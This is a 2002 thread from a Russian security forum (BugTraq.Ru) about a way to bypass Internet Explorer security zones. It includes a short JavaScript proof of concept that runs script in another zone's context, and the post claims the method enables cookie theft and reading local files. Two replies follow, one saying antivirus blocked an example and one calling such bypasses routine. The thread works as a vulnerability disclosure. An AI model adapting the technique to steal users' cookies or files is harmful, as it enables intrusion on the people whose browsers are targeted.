информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Страшный баг в WindowsГде водятся OGRыПортрет посетителя
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Блокировка российских аккаунтов... 
 Отзыв сертификатов ЦБ РФ, ПСБ,... 
 Памятка мирным людям во время информационной... 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / site updates
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
Обход зон безопасности в IE 03.10.02 02:32  
Publisher: dl <Dmitry Leonov>
Отредактировано 03.10.02 02:55  Количество правок: 1
<"чистая" ссылка>
Обход зон безопасности в IE
пример 1,пример 2 http://www16.brinkster.com/liudieyu/SaveRef/SaveRef-MyPage.htm, http://jscript.dk/2002/10/sec/SaveRefLocalFile.html

Сохранение ссылки на NewWindow.location.assign, где NewWindow - окно, созданное скриптом, позволяет выполнить произвольный скрипт в любой зоне безопасности:
function f(){}
w=window.open("nothing.htm","_blank","height=150 width=150 left=0 top=0");
f=w.location.assign;
w.location.href="http://www.yahoo.com";
alert("wait for the page");
f("javascript:alert(document.body.innerHTML)");
Первой строчкой открываем окно с локальным файлом (возможно, и несуществующим), сохраняем ссылку н аэто окно, далее, открыв в нем страницу из другой зоны, вызываем код в ее контексте.
Помимо кражи кук пользователя с произвольных сайтов, это дает возможность получить доступ к локальным файлам - см. пример 2.


Полный текст
Обход зон безопасности в IE 05.10.02 02:26  
Автор: RedAndr UfaTeam <Андрей Рыжков> Статус: Member
<"чистая" ссылка>
Помимо кражи кук пользователя с произвольных сайтов, это
> дает возможность получить доступ к локальным файлам - см.
> пример 2.
У меня AVP второй пример зарубил :)
Обход зон безопасности в IE 07.10.02 22:57  
Автор: Digital_Scream Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Как на меня ничего особенного. Обход зон безопасности в IE сталь обычным делом. Есть способы на любой вкус, а это еще один :)
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2022 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach